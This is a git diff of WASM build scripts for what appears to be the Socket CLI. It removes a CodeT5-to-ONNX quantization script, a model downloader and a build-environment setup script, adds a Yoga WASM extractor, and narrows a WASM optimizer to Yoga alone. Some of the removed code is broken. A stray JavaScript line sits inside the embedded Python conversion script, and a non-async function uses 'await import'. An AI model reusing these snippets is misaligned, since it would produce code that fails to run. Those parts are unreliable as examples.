exec(pythonCmd, ['-c', `import ${importName}`]) - logger.info(`✓ ${importName} installed`) - } catch { - logger.info(`❌ ${importName} not found`) - missingPackages.push(packageName) - } -} - -// Install missing packages. -if (missingPackages.length > 0) { - logger.info(`\n📦 Installing missing packages: ${missingPackages.join(', ')}`) - logger.substep('This may take a few minutes...\n') - - try { - const pipCmd = pythonCmd === 'python3' ? 'pip3' : 'pip' - await exec(pipCmd, ['install', ...missingPackages], { stdio: 'inherit' }) - logger.info('\n✓ Packages installed successfully\n') - - // Check for NumPy 2.x compatibility issue. - try { - await exec(pythonCmd, ['-c', 'import numpy; import torch']) - } catch { - logger.info( - '⚠ NumPy 2.x detected, downgrading to 1.x for PyTorch compatibility...', - ) - await exec(pipCmd, ['install', 'numpy<2'], { stdio: 'inherit' }) - logger.done(' NumPy downgraded\n') - } - } catch (e) { - logger.error('\n❌ Package installation failed') - logger.error(`Error: ${e.message}`) - logger.error( - ' Please install manually: pip install optimum[onnxruntime] torch transformers onnx onnxruntime', - ) - process.exit(1) - } -} else { - logger.info('\n✓ All required packages are installed\n') -} - -// Step 3: Create output directory. -logger.substep('Step Creating output directory...\n') -await fs.mkdir(modelsPath, { recursive: true }) -logger.info(`✓ Created ${modelsPath}\n`) - -// Step 4: Check if models already exist. -const encoderPath = path.join(modelsPath, 'codet5-encoder-int4.onnx') -const decoderPath = path.join(modelsPath, 'codet5-decoder-int4.onnx') -const tokenizerPath = path.join(modelsPath, 'codet5-tokenizer.json') - -if ( - existsSync(encoderPath) && - existsSync(decoderPath) && - existsSync(tokenizerPath) -) { - logger.done(' CodeT5 models already exist:') - logger.substep(`- ${encoderPath}`) - logger.substep(`- ${decoderPath}`) - logger.substep(`- ${tokenizerPath}\n`) - - const stats = await fs.stat(encoderPath) - logger.substep(`Encoder size: ${(stats.size / 1024 / 1024).toFixed(2)} MB`) - const decoderStats = await fs.stat(decoderPath) - logger.info( - ` Decoder size: ${(decoderStats.size / 1024 / 1024).toFixed(2)} MB\n`, - ) - - logger.done(' Conversion not needed (models already exist)\n') - process.exit(0) -} - -// Step 5: Convert models using Python script. -logger.substep('Step Converting CodeT5 models...\n') -logger.progress(' This will download ~240MB from HuggingFace') -logger.info( - ' and convert to ~90MB ONNX int4 format (50% smaller than int8)\n', -) - -// Create Python conversion script with INT4 quantization. -const pythonScript = ` -""" -CodeT5 to ONNX INT4 Quantization Script - -This script: -1. Downloads CodeT5-small from HuggingFace (~240MB) -2. Exports to ONNX format (FP32) -3. Applies INT4 quantization (4-bit weights, 50% size reduction) -4. Saves encoder, decoder, and tokenizer - -INT4 Quantization Benefits: -- 50% smaller than INT8 (~90MB vs ~180MB) -- Only 1-2% quality loss (excellent for encoder-decoder models) -- Fully supported by ONNX Runtime -""" -import json -import os -from pathlib import Path -from optimum.onnxruntime import ORTModelForSeq2SeqLM, ORTQuantizer -from optimum.onnxruntime.configuration import AutoQuantizationConfig -from transformers import AutoTokenizer - -# Model configuration. -MODEL_NAME = "Salesforce/codet5-small" -OUTPUT_DIR = Path("${modelsPath}") -TEMP_DIR = OUTPUT_DIR / "temp" - -print("\\n📥 Downloading CodeT5 from HuggingFace...") -print(f" Model: {MODEL_NAME}\\n") - -# Step 1: Export model to ONNX (FP32). -print("🔧 Exporting to ONNX format...") -model = ORTModelForSeq2SeqLM.from_pretrained(MODEL_NAME, export=True) -TEMP_DIR.mkdir(parents=True, exist_ok=True) -model.save_pretrained(TEMP_DIR) - -# Step 2: Apply INT4 quantization to encoder and decoder. -print("🔧 Quantizing to INT4 (4-bit weights)...") -print(" This reduces size by 50% with only 1-2% quality loss\\n") - -# Quantize encoder. -encoder_path = TEMP_DIR / "encoder_model.onnx" -encoder_quantizer = ORTQuantizer.from_pretrained(TEMP_DIR, file_name="encoder_model.onnx") -encoder_quantizer.quantize( - save_dir=OUTPUT_DIR, - file_suffix="encoder-int4", - quantization_config=AutoQuantizationConfig.arm64(is_static=False, per_channel=True), -) -print(" ✓ Encoder quantized") - -# Quantize decoder. -decoder_path = TEMP_DIR / "decoder_model.onnx" -decoder_quantizer = ORTQuantizer.from_pretrained(TEMP_DIR, file_name="decoder_model.onnx") -decoder_quantizer.quantize( - save_dir=OUTPUT_DIR, - file_suffix="decoder-int4", - quantization_config=AutoQuantizationConfig.arm64(is_static=False, per_channel=True), -) -print(" ✓ Decoder quantized\\n") - -# Step 3: Rename output files to match expected names. -os.rename(OUTPUT_DIR / "encoder_model_encoder-int4.onnx", OUTPUT_DIR / "codet5-encoder-int4.onnx") -os.rename(OUTPUT_DIR / "decoder_model_decoder-int4.onnx", OUTPUT_DIR / "codet5-decoder-int4.onnx") - -# Step 4: Save tokenizer configuration. -print("💾 Saving tokenizer...") -tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME) -tokenizer_path = OUTPUT_DIR / "codet5-tokenizer.json" -with open(tokenizer_path, "w") as f: - json.dump({ - "vocab": tokenizer.get_vocab(), - "model_max_length": tokenizer.model_max_length, - "bos_token": tokenizer.bos_token, - "eos_token": tokenizer.eos_token, - "pad_token": tokenizer.pad_token, - }, f, indent=2) - -# Cleanup temporary files. -import shutil - -const logger = getDefaultLogger() -shutil.rmtree(TEMP_DIR) - -print("\\n✓ Conversion complete!") -print(f" Encoder: {OUTPUT_DIR}/codet5-encoder-int4.onnx") -print(f" Decoder: {OUTPUT_DIR}/codet5-decoder-int4.onnx") -print(f" Tokenizer: {OUTPUT_DIR}/codet5-tokenizer.json") -print("\\n Expected size: ~90MB total (50% smaller than INT8)") -` - -try { - await exec(pythonCmd, ['-c', pythonScript], { stdio: 'inherit' }) -} catch (_e) { - logger.error('\n❌ Conversion failed') - logger.error('Please check the error messages above\n') - process.exit(1) -} - -// Step 6: Verify output files. -logger.info('\nStep 5: Verifying output files...\n') - -if (!existsSync(encoderPath)) { - logger.error(`❌ Encoder not found: ${encoderPath}`) - process.exit(1) -} - -if (!existsSync(decoderPath)) { - logger.error(`❌ Decoder not found: ${decoderPath}`) - process.exit(1) -} - -if (!existsSync(tokenizerPath)) { - logger.error(`❌ Tokenizer not found: ${tokenizerPath}`) - process.exit(1) -} - -const encoderStats = await fs.stat(encoderPath) -const decoderStats = await fs.stat(decoderPath) -const tokenizerStats = await fs.stat(tokenizerPath) - -logger.done(' All files created successfully:') -logger.substep(`Encoder: ${(encoderStats.size / 1024 / 1024).toFixed(2)} MB`) -logger.substep(`Decoder: ${(decoderStats.size / 1024 / 1024).toFixed(2)} MB`) -logger.substep(`Tokenizer: ${(tokenizerStats.size / 1024).toFixed(2)} KB\n`) - -logger.info('Next steps:') -logger.info(' 1. Run: node scripts/wasm/build-unified-wasm.mjs') -logger.info(' 2. The models will be embedded in the unified WASM bundle\n') diff --git a/scripts/wasm/download-models.mjs b/scripts/wasm/download-models.mjs deleted file mode 100644 index 934802abe..000000000 --- a/scripts/wasm/download-models.mjs +++ /dev/null @@ -1,288 +0,0 @@ -/** - * Download all model assets for unified WASM bundle. - * - * WHAT THIS DOWNLOADS: - * 1. MiniLM model (int8 quantized, ~17MB) - * 2. MiniLM tokenizer (~500KB) - * 3. CodeT5 encoder (int4 quantized, ~30MB) - * 4. CodeT5 decoder (int4 quantized, ~60MB) - * 5. CodeT5 tokenizer (~500KB) - * 6. ONNX Runtime WASM (~2-5MB) - * 7. Yoga Layout WASM (~95KB) - copied from node_modules - * - * OUTPUT: - * All files saved to .cache/models/ - */ - -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' - -const logger = getDefaultLogger() - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const cacheDir = path.join(rootPath, '.cache/models') - -// Model sources. -const MINILM_REPO = 'Xenova/paraphrase-MiniLM-L3-v2' -const MINILM_BASE = `https://huggingface.co/${MINILM_REPO}/resolve/main` - -const CODET5_REPO = 'Salesforce/codet5-small' -const _CODET5_BASE = `https://huggingface.co/${CODET5_REPO}/resolve/main` - -// NOTE: CodeT5 ONNX files don't exist yet on HuggingFace. -// For now, we'll use placeholder URLs - these need to be converted first. -// See scripts/wasm/convert-codet5.mjs for conversion process. - -const FILES = [ - // MiniLM (already quantized on HuggingFace). - { - description: 'MiniLM model (int8)', - name: 'minilm-int8.onnx', - url: `${MINILM_BASE}/onnx/model_quantized.onnx`, - }, - { - description: 'MiniLM tokenizer', - name: 'minilm-tokenizer.json', - url: `${MINILM_BASE}/tokenizer.json`, - }, - - // CodeT5 (needs manual conversion first - see convert-codet5.mjs). - { - copyFrom: null, // Set after conversion - description: 'CodeT5 encoder (int4)', - name: 'codet5-encoder-int4.onnx', - url: null, // Needs conversion first - }, - { - copyFrom: null, - description: 'CodeT5 decoder (int4)', - name: 'codet5-decoder-int4.onnx', - url: null, // Needs conversion first - }, - { - description: 'CodeT5 tokenizer', - name: 'codet5-tokenizer.json', - url: null, // Will be created by convert-codet5.mjs - }, - - // ONNX Runtime WASM (from node_modules). - // Using SIMD-only (no threading) variant - saves ~2 MB. - // Our inference code doesn't use multi-threading features. - { - copyFrom: 'node_modules/onnxruntime-web/dist/ort-wasm-simd.wasm', - description: 'ONNX Runtime WASM (SIMD only)', - name: 'ort-wasm-simd.wasm', - url: null, - }, - - // Yoga Layout WASM (extracted from base64). - { - extractYoga: true, - description: 'Yoga Layout WASM', - name: 'yoga.wasm', - url: null, - }, -] - -/** - * Download file with progress. - */ -async function downloadFile(url, outputPath, description) { - logger.info(`📦 Downloading ${description}...`) - logger.substep(`URL: ${url}`) - - const response = await fetch(url) - - if (!response.ok) { - throw new Error(`Failed to download ${url}: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - - await fs.writeFile(outputPath, Buffer.from(buffer)) - - const sizeMB = (buffer.byteLength / 1024 / 1024).toFixed(2) - logger.substep(`✓ Downloaded ${sizeMB} MB`) - logger.substep(`✓ Saved to ${outputPath}\n`) - - return buffer.byteLength -} - -/** - * Copy file from source to dest. - */ -async function copyFile(source, dest, description) { - logger.info(`📋 Copying ${description}...`) - logger.substep(`From: ${source}`) - - const fullSource = path.join(rootPath, source) - - if (!existsSync(fullSource)) { - throw new Error(`Source file not found: ${fullSource}`) - } - - const buffer = await fs.readFile(fullSource) - await fs.writeFile(dest, buffer) - - const sizeKB = (buffer.length / 1024).toFixed(2) - logger.substep(`✓ Copied ${sizeKB} KB`) - logger.substep(`✓ Saved to ${dest}\n`) - - return buffer.length -} - -/** - * Extract yoga WASM from base64-encoded file. - */ -async function extractYogaWasm(dest, description) { - logger.info(`📦 Extracting ${description}...`) - - const yogaBase64File = path.join( - rootPath, - 'node_modules/yoga-layout/dist/binaries/yoga-wasm-base64-esm.js', - ) - - if (!existsSync(yogaBase64File)) { - throw new Error(`yoga-layout not installed: ${yogaBase64File}`) - } - - const content = await fs.readFile(yogaBase64File, 'utf-8') - - // Extract base64 WASM data. - // Pattern: H="data:application/octet-stream;base64," - const match = content.match( - /H="data:application\/octet-stream;base64,([^"]+)"/, - ) - - if (!match) { - throw new Error( - 'Could not find WASM base64 data in yoga-layout binary file', - ) - } - - const base64Data = match[1] - const wasmBuffer = Buffer.from(base64Data, 'base64') - - await fs.writeFile(dest, wasmBuffer) - - const sizeKB = (wasmBuffer.length / 1024).toFixed(2) - logger.substep(`✓ Extracted ${sizeKB} KB`) - logger.substep(`✓ Saved to ${dest}\n`) - - return wasmBuffer.length -} - -/** - * Main download logic. - */ -export async function downloadModels() { - logger.info('╔═══════════════════════════════════════════════════╗') - logger.info('║ Download Model Assets ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - - // Create cache directory. - await fs.mkdir(cacheDir, { recursive: true }) - logger.info(`✓ Cache directory: ${cacheDir}\n`) - - let totalBytes = 0 - const missing = [] - - // Download/copy each file. - for (const file of FILES) { - const outputPath = path.join(cacheDir, file.name) - - // Check if file already exists. - try { - await fs.access(outputPath) - const stats = await fs.stat(outputPath) - const sizeMB = (stats.size / 1024 / 1024).toFixed(2) - logger.info(`✓ ${file.description} already exists (${sizeMB} MB)`) - logger.substep(`${outputPath}\n`) - totalBytes += stats.size - continue - } catch { - // File doesn't exist - download or copy it. - } - - // Check if this is a copy operation. - if (file.copyFrom) { - try { - const bytes = await copyFile( - file.copyFrom, - outputPath, - file.description, - ) - totalBytes += bytes - } catch (e) { - logger.error(`✗ Failed to copy: ${e.message}`) - logger.error( - ' Please ensure dependencies are installed: pnpm install\n', - ) - missing.push(file.name) - } - continue - } - - // Check if this is yoga extraction. - if (file.extractYoga) { - try { - const bytes = await extractYogaWasm(outputPath, file.description) - totalBytes += bytes - } catch (e) { - logger.error(`✗ Failed to extract: ${e.message}`) - logger.error( - ' Please ensure yoga-layout is installed: pnpm install\n', - ) - missing.push(file.name) - } - continue - } - - // Check if URL is provided. - if (!file.url) { - logger.info(`⚠ ${file.description} needs manual setup`) - logger.substep(`File: ${file.name}`) - logger.substep('Run: node scripts/wasm/convert-codet5.mjs\n') - missing.push(file.name) - continue - } - - // Download file. - try { - const bytes = await downloadFile(file.url, outputPath, file.description) - totalBytes += bytes - } catch (e) { - logger.error(`✗ Download failed: ${e.message}\n`) - missing.push(file.name) - } - } - - logger.info('╔═══════════════════════════════════════════════════╗') - logger.info('║ Download Summary ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - logger.info(`Total size: ${(totalBytes / 1024 / 1024).toFixed(2)} MB`) - - if (missing.length > 0) { - logger.info(`\n⚠ Missing files (${missing.length}):`) - for (const file of missing) { - logger.substep(`- ${file}`) - } - logger.info('\nNext steps:') - logger.info(' 1. For CodeT5 models: node scripts/wasm/convert-codet5.mjs') - logger.info(' 2. For node_modules files: pnpm install') - return false - } - - logger.info('\n✓ All files downloaded successfully') - return true -} - -// Run if called directly. -if (import.meta.url === `file://${process.argv[1]}`) { - const success = await downloadModels() - process.exit(success ? 0 : 1) -} diff --git a/scripts/wasm/extract-yoga.mjs b/scripts/wasm/extract-yoga.mjs new file mode 100644 index 000000000..c29b5dbc7 --- /dev/null +++ b/scripts/wasm/extract-yoga.mjs @@ -0,0 +1,111 @@ +/** + * Download Yoga Layout WASM. + * + * WHAT THIS EXTRACTS: + * - Yoga Layout WASM (~95KB) - extracted from yoga-layout package + * + * OUTPUT: + * File saved to .cache/models/yoga.wasm + */ + +import { existsSync, promises as fs } from 'node:fs' +import path from 'node:path' +import { fileURLToPath } from 'node:url' + +import { getDefaultLogger } from '@socketsecurity/lib/logger' + +const logger = getDefaultLogger() + +const __dirname = path.dirname(fileURLToPath(import.meta.url)) +const rootPath = path.join(__dirname, '../..') +const cacheDir = path.join(rootPath, '.cache/models') + + +/** + * Extract yoga WASM from base64-encoded file. + */ +async function extractYogaWasm(dest, description) { + logger.info(`📦 Extracting ${description}...`) + + const yogaBase64File = path.join( + rootPath, + 'node_modules/yoga-layout/dist/binaries/yoga-wasm-base64-esm.js', + ) + + if (!existsSync(yogaBase64File)) { + throw new Error(`yoga-layout not installed: ${yogaBase64File}`) + } + + const content = await fs.readFile(yogaBase64File, 'utf-8') + + // Extract base64 WASM data. + // Pattern: H="data:application/octet-stream;base64," + const match = content.match( + /H="data:application\/octet-stream;base64,([^"]+)"/, + ) + + if (!match) { + throw new Error( + 'Could not find WASM base64 data in yoga-layout binary file', + ) + } + + const base64Data = match[1] + const wasmBuffer = Buffer.from(base64Data, 'base64') + + await fs.writeFile(dest, wasmBuffer) + + const sizeKB = (wasmBuffer.length / 1024).toFixed(2) + logger.substep(`✓ Extracted ${sizeKB} KB`) + logger.substep(`✓ Saved to ${dest}\n`) + + return wasmBuffer.length +} + +/** + * Main extraction logic. + */ +export async function extractYoga() { + logger.info('╔═══════════════════════════════════════════════════╗') + logger.info('║ Extract Yoga Layout WASM ║') + logger.info('╚═══════════════════════════════════════════════════╝\n') + + // Create cache directory. + await fs.mkdir(cacheDir, { recursive: true }) + logger.info(`✓ Cache directory: ${cacheDir}\n`) + + const outputPath = path.join(cacheDir, 'yoga.wasm') + + // Check if file already exists. + try { + await fs.access(outputPath) + const stats = await fs.stat(outputPath) + const sizeKB = (stats.size / 1024).toFixed(2) + logger.info(`✓ Yoga Layout WASM already exists (${sizeKB} KB)`) + logger.substep(`${outputPath}\n`) + return true + } catch { + // File doesn't exist - extract it. + } + + // Extract yoga WASM. + try { + await extractYogaWasm(outputPath, 'Yoga Layout WASM') + } catch (e) { + logger.error(`✗ Failed to extract: ${e.message}`) + logger.error(' Please ensure yoga-layout is installed: pnpm install\n') + return false + } + + logger.info('╔═══════════════════════════════════════════════════╗') + logger.info('║ Extraction Summary ║') + logger.info('╚═══════════════════════════════════════════════════╝\n') + logger.info('✓ Yoga Layout WASM extracted successfully') + return true +} + +// Run if called directly. +if (import.meta.url === `file://${process.argv[1]}`) { + const success = await extractYoga() + process.exit(success ? 0 : 1) +} diff --git a/scripts/wasm/optimize-embedded-wasm.mjs b/scripts/wasm/optimize-yoga.mjs similarity index 64% rename from scripts/wasm/optimize-embedded-wasm.mjs rename to scripts/wasm/optimize-yoga.mjs index 628d9920e..bc795655d 100644 --- a/scripts/wasm/optimize-embedded-wasm.mjs +++ b/scripts/wasm/optimize-yoga.mjs @@ -1,15 +1,11 @@ /** - * Optimize Third-Party WASM Files Before Embedding + * Optimize Yoga Layout WASM Before Embedding * - * Optimizes ONNX Runtime, Yoga Layout, and other WASM files - * BEFORE they're embedded into the unified bundle. - * - * This is where the real savings happen - optimizing the 95% of - * the bundle that's pre-built third-party code. + * Optimizes Yoga Layout WASM file before embedding into the bundle. * * USAGE: - * node scripts/wasm/optimize-embedded-wasm.mjs - * node scripts/wasm/optimize-embedded-wasm.mjs --aggressive + * node scripts/wasm/optimize-yoga.mjs + * node scripts/wasm/optimize-yoga.mjs --aggressive */ import { existsSync, promises as fs } from 'node:fs' @@ -154,60 +150,33 @@ async function main() { // Ensure cache directory exists. await fs.mkdir(cacheDir, { recursive: true }) - logger.info('\nOptimizing third-party WASM files:\n') - - let totalOriginal = 0 - let totalOptimized = 0 - - // List of WASM files to optimize. - const wasmFiles = [ - { - input: path.join(cacheDir, 'ort-wasm-simd.wasm'), - name: 'ONNX Runtime (SIMD only)', - output: path.join(cacheDir, 'ort-wasm-simd-optimized.wasm'), - }, - { - input: path.join(cacheDir, 'yoga.wasm'), - name: 'Yoga Layout', - output: path.join(cacheDir, 'yoga-optimized.wasm'), - }, - ] - - // Optimize each file. - for (const file of wasmFiles) { - if (!existsSync(file.input)) { - logger.warn(`Skipping ${file.name} (not found)`) - continue - } - - const originalSize = Number.parseFloat(await getFileSizeMB(file.input)) - await optimizeWasmFile(file.input, file.output, { - aggressive: isAggressive, - name: file.name, - }) - const optimizedSize = Number.parseFloat(await getFileSizeMB(file.output)) + logger.info('\nOptimizing Yoga Layout WASM:\n') - totalOriginal += originalSize - totalOptimized += optimizedSize + // Yoga WASM file to optimize. + const inputFile = path.join(cacheDir, 'yoga.wasm') + const outputFile = path.join(cacheDir, 'yoga-optimized.wasm') - logger.log('') // Spacing. + if (!existsSync(inputFile)) { + logger.error('Yoga WASM not found') + logger.substep('Please run: node scripts/wasm/extract-yoga.mjs') + process.exit(1) } - // Summary. - if (totalOriginal > 0) { - const totalSavings = ((1 - totalOptimized / totalOriginal) * 100).toFixed(1) - logger.success('Optimization Complete') - logger.info(`Total original: ${totalOriginal.toFixed(2)} MB`) - logger.info(`Total optimized: ${totalOptimized.toFixed(2)} MB`) - logger.info(`Total savings: ${totalSavings}%`) - logger.info( - `\nSaved ${(totalOriginal - totalOptimized).toFixed(2)} MB across all files`, - ) - } + const originalSize = Number.parseFloat(await getFileSizeMB(inputFile)) + await optimizeWasmFile(inputFile, outputFile, { + aggressive: isAggressive, + name: 'Yoga Layout', + }) + const optimizedSize = Number.parseFloat(await getFileSizeMB(outputFile)) - logger.info('\nNext steps:') - logger.info('1. Update Rust code to use optimized files') - logger.info('2. Rebuild WASM bundle: pnpm wasm:build') + // Summary. + const totalSavings = ((1 - optimizedSize / originalSize) * 100).toFixed(1) + logger.log('') + logger.success('Optimization Complete') + logger.info(`Original: ${originalSize.toFixed(2)} MB`) + logger.info(`Optimized: ${optimizedSize.toFixed(2)} MB`) + logger.info(`Savings: ${totalSavings}%`) + logger.info(`\nSaved ${(originalSize - optimizedSize).toFixed(2)} MB`) } main().catch(e => { diff --git a/scripts/wasm/setup-build-env.mjs b/scripts/wasm/setup-build-env.mjs deleted file mode 100644 index 6b0ec07b8..000000000 --- a/scripts/wasm/setup-build-env.mjs +++ /dev/null @@ -1,193 +0,0 @@ -/** - * Setup WASM Build Environment - * - * Configures optimal build settings for WASM compilation. - * - * OPTIMIZATIONS: - * - sccache: Shared compilation cache (40-60% faster clean builds) - * - Cargo parallel builds: Use all CPU cores - * - RUSTFLAGS: Additional optimization flags - * - * USAGE: - * node scripts/wasm/setup-build-env.mjs - * source ~/.zshrc # or ~/.bashrc - * - * Or evaluate inline: - * eval "$(node scripts/wasm/setup-build-env.mjs --export)" - */ - -import { existsSync } from 'node:fs' -import { promises as fs } from 'node:fs' -import { homedir } from 'node:os' -import path from 'node:path' -import { execSync } from 'node:child_process' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' - - -const logger = getDefaultLogger() -const isExportMode = process.argv.includes('--export') - -/** - * Check if command exists. - */ -function commandExists(command) { - try { - execSync(`which ${command}`, { stdio: 'pipe' }) - return true - } catch { - return false - } -} - -/** - * Get number of CPU cores. - */ -function getCpuCount() { - try { - const { cpus } = await import('node:os') - return cpus().length - } catch { - return 4 // Default fallback - } -} - -/** - * Check if sccache is installed. - */ -function checkSccache() { - if (commandExists('sccache')) { - logger.success('sccache found') - return true - } - - logger.warn('sccache not installed') - logger.substep('Install for 40-60% faster clean builds:') - logger.substep(' cargo install sccache') - return false -} - -/** - * Setup shell configuration. - */ -async function setupShellConfig() { - const shell = process.env.SHELL || '' - const isZsh = shell.includes('zsh') - const isBash = shell.includes('bash') - - const configFile = isZsh - ? path.join(homedir(), '.zshrc') - : isBash - ? path.join(homedir(), '.bashrc') - : null - - if (!configFile) { - logger.warn('Could not detect shell (zsh or bash)') - return null - } - - return configFile -} - -/** - * Generate environment variables. - */ -async function generateEnvVars() { - const hasSccache = checkSccache() - const cpuCount = getCpuCount() - const cacheDir = path.join(homedir(), '.cache') - - const envVars = { - // Cargo parallel builds. - CARGO_BUILD_JOBS: cpuCount.toString(), - - // Go cache. - GOCACHE: path.join(cacheDir, 'go-build'), - - // Rust incremental compilation cache. - CARGO_INCREMENTAL: '1', - - // Target directory (for consistency). - CARGO_TARGET_DIR: 'target', - } - - // Add sccache if available. - if (hasSccache) { - envVars.RUSTC_WRAPPER = 'sccache' - envVars.SCCACHE_DIR = path.join(cacheDir, 'sccache') - } - - return envVars -} - -/** - * Main entry point. - */ -async function main() { - if (!isExportMode) { - logger.step('WASM Build Environment Setup') - logger.substep('Checking build tools and configuration\n') - } - - const envVars = await generateEnvVars() - - if (isExportMode) { - // Export mode: output shell commands. - for (const [key, value] of Object.entries(envVars)) { - logger.log(`export ${key}="${value}"`) - } - return - } - - // Interactive mode: show configuration. - logger.info('Recommended environment variables:\n') - for (const [key, value] of Object.entries(envVars)) { - logger.substep(`${key}=${value}`) - } - - // Check shell config. - const configFile = await setupShellConfig() - if (!configFile) { - logger.info('\nAdd these to your shell configuration manually.') - return - } - - logger.info(`\nTo apply these settings automatically, add to ${configFile}:\n`) - - // Generate shell script snippet. - const shellScript = [ - '# Socket CLI WASM Build Optimizations', - '# Generated by scripts/wasm/setup-build-env.mjs', - '', - ] - - for (const [key, value] of Object.entries(envVars)) { - shellScript.push(`export ${key}="${value}"`) - } - - shellScript.push('') - - logger.substep(shellScript.join('\n')) - - // Check if already configured. - if (existsSync(configFile)) { - const content = await fs.readFile(configFile, 'utf-8') - if (content.includes('Socket CLI WASM Build Optimizations')) { - logger.success('\nAlready configured in shell config') - return - } - } - - logger.info('\nTo append automatically, run:') - logger.substep( - `node scripts/wasm/setup-build-env.mjs --export >> ${configFile}`, - ) - logger.substep(`source ${configFile}`) -} - -main().catch(e => { - if (!isExportMode) { - logger.error('Setup failed:', e) - } - process.exit(1) -})